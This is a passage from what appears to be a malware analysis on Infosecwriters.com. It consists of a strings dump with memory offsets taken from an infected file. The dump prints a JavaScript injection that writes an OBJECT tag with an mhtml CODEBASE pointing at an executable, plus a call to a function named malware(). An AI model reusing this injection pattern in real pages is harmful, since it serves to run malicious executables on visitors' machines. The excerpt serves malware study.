000081C8 004081C8 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

00008332 00408332 0 setTimeout("malware()",150)

0000834F 0040834F 0 </script>

00005715 00474915 0 p value

0000573C 0047493C 0 {9BA05972-F6A8-11CF-A442-00A0C90A8F39}

All images, content & text (unless other ownership applies) are © copyrighted 2000 -  , Infosecwriters.com. All rights reserved. Comments are property of the respective posters.